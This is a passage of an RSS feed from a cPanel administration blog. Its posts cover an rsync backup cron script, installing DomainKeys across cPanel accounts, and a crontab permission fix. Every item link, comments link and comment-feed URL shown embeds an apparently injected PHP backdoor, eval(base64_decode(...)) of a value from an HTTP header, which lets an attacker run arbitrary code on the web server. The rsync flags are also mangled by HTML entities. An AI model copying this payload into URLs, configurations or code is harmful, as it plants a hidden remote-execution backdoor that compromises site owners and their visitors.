If you want to run it once a week go to /etc/cron.weekly/</p>
<blockquote><p>cd /etc/cron.weekly/</p></blockquote>
<p>Now we will create the backup script</p>
<blockquote><p>nano backup</p></blockquote>
<p>Paste into this file the fallowing</p>
<blockquote><p> #!/bin/bash<br />
mount -o remount,rw /backups<br />
rsync -av &#8211;delete &#8211;exclude=/backups / /backups<br />
mount -o remount,ro /backups</p></blockquote>
<p>This will backup &#8220;/&#8221; to&#8221; /backups&#8221;, replacing only the changed files since the last backup. It will also mount /backups in read/write mode first and after the backup is finished it will mount it in read-only mode.</p>
<p>Hope it helps !<br />
<!--adsense--></p>
<p>PS: Remember that this is just a basic  backup script. There are many enhancements that can be done and if you have some creative ideas please leave a comment with your suggestions.<br />
Also please note that this does <strong>not</strong> replace the need for a fault tolerant solution such as a RAID matrix.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cpanelconfig.com/2007/12/22/backup-your-data-on-a-backup-hdd-with-rsync/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Installing DomainKeys on a cPanel server</title>
		<link>http://www.cpanelconfig.com/2007/10/14/installing-domainkeys-on-a-cpanel-server/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/</link>
		<comments>http://www.cpanelconfig.com/2007/10/14/installing-domainkeys-on-a-cpanel-server/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/#comments</comments>
		<pubDate>Sun, 14 Oct 2007 20:52:14 +0000</pubDate>
		<dc:creator>yolau</dc:creator>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[cPanel Administration]]></category>
		<category><![CDATA[cpanel]]></category>
		<category><![CDATA[domainkey]]></category>
		<category><![CDATA[DomainKeys]]></category>
		<category><![CDATA[install]]></category>
		<category><![CDATA[yahoo]]></category>

		<guid isPermaLink="false">http://www.cpanelconfig.com/cpanel-administration/installing-domainkeys-on-a-cpanel-server/</guid>
		<description><![CDATA[Delivering mail to yahoo and google is so hard those days. Almost every server has had this problem even if it is not used to relay spam.
Installing DomainKeys can help your server deliver &#8220;clean&#8221; emails directly to your user&#8217;s inbox.
What are DomainKeys?
Well you will find more information on this topic at: http://antispam.yahoo.com/domainkeys

Installation is simple and [...]]]></description>
			<content:encoded><![CDATA[<p>Delivering mail to yahoo and google is so hard those days. Almost every server has had this problem even if it is not used to relay spam.<br />
Installing DomainKeys can help your server deliver &#8220;clean&#8221; emails directly to your user&#8217;s inbox.<br />
<strong>What are DomainKeys?</strong><br />
Well you will find more information on this topic at: <a href="http://antispam.yahoo.com/domainkeys" title="Yahoo DomainKeys">http://antispam.yahoo.com/domainkeys</a><br />
<!--adsense--><br />
<strong>Installation</strong> is simple and it&#8217;s done on a domain basis.</p>
<p>How to install DomainKeys on a specific domain.</p>
<ol>
<li>First check that you are running the latest version on RELEASE or CURRENT of cPanel 11.</li>
<li>Run the script</li>
<blockquote><p>/usr/local/cpanel/bin/domain_keys_installer username</p></blockquote>
<p>Where username is the cPanel user.</ol>
<p>If you get an error similar to &#8220;Domain keys are not installed on this machine.&#8221; you either are not running the latest release or current version of cPanel or you have not converted yet to maildir. Maildir conversion is required before you install DomainKeys.<br />
You will find an article about converting to maildir on this site !</p>
<p>Ok, we just installed DomainKeys for a domain, but how about if we want to install it for all the domains (users)?<br />
Well I found the solution just a few days ago on a public forum. Someone wrote a nice bash script that will parse all the cpanel users and then run the installation for each of them.<br />
<!--adsense--></p>
<blockquote><p>for i in `ls /var/cpanel/users` ;do /usr/local/cpanel/bin/domain_keys_installer $i ;done</p></blockquote>
<p>Ok, but what about if we want that every new created account to have DomainKeys installed. Well this is a bit harder to do.<br />
I recommend editing /scripts/postwwwacct and adding:</p>
<blockquote><p>my %OPTS = @ARGV;<br />
my $user = $OPTS{&#8217;user&#8217;};<br />
/usr/local/cpanel/bin/domain_keys_installer $user</p></blockquote>
<p>Now test this by creating a new account.</p>
<p><!--adsense--></p>
<p>If you have any problems please don&#8217;t hesitate to leave a commnent here.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cpanelconfig.com/2007/10/14/installing-domainkeys-on-a-cpanel-server/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/feed/</wfw:commentRss>
		<slash:comments>52</slash:comments>
		</item>
		<item>
		<title>Fix cron problems on new cPanel 11.x servers</title>
		<link>http://www.cpanelconfig.com/2007/09/11/fix-cron-problems-on-new-cpanel-11x-servers/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/</link>
		<comments>http://www.cpanelconfig.com/2007/09/11/fix-cron-problems-on-new-cpanel-11x-servers/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/#comments</comments>
		<pubDate>Tue, 11 Sep 2007 21:16:07 +0000</pubDate>
		<dc:creator>yolau</dc:creator>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[cron]]></category>
		<category><![CDATA[cron problems]]></category>

		<guid isPermaLink="false">http://www.cpanelconfig.com/how-to/fix-cron-problems-on-new-cpanel-11x-servers/</guid>
		<description><![CDATA[
I&#8217;ve noticed that on some new installs of cPanel 11.x + CentOS 5.0 there is a problem with cron jobs where the crons are not saved at all with no apparent reason and with no errors.
After some investigations I&#8217;ve found out that this is do to the fact that crontab doesn&#8217;t have the correct permissions.
It&#8217;s [...]]]></description>
			<content:encoded><![CDATA[<p><!--adsense--></p>
<p>I&#8217;ve noticed that on some new installs of cPanel 11.x + CentOS 5.0 there is a problem with cron jobs where the crons are not saved at all with no apparent reason and with no errors.<br />
After some investigations I&#8217;ve found out that this is do to the fact that crontab doesn&#8217;t have the correct permissions.<br />
It&#8217;s an easy fix and all you have to run as root is:</p>
<blockquote><p>chmod a+s /usr/bin/crontab</p></blockquote>
<p>Now try to add your crons again. It should work.<br />
<!--adsense--></p>
]]></content:encoded>
			<wfw:commentRss>http://www.cpanelconfig.com/2007/09/11/fix-cron-problems-on-new-cpanel-11x-servers/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
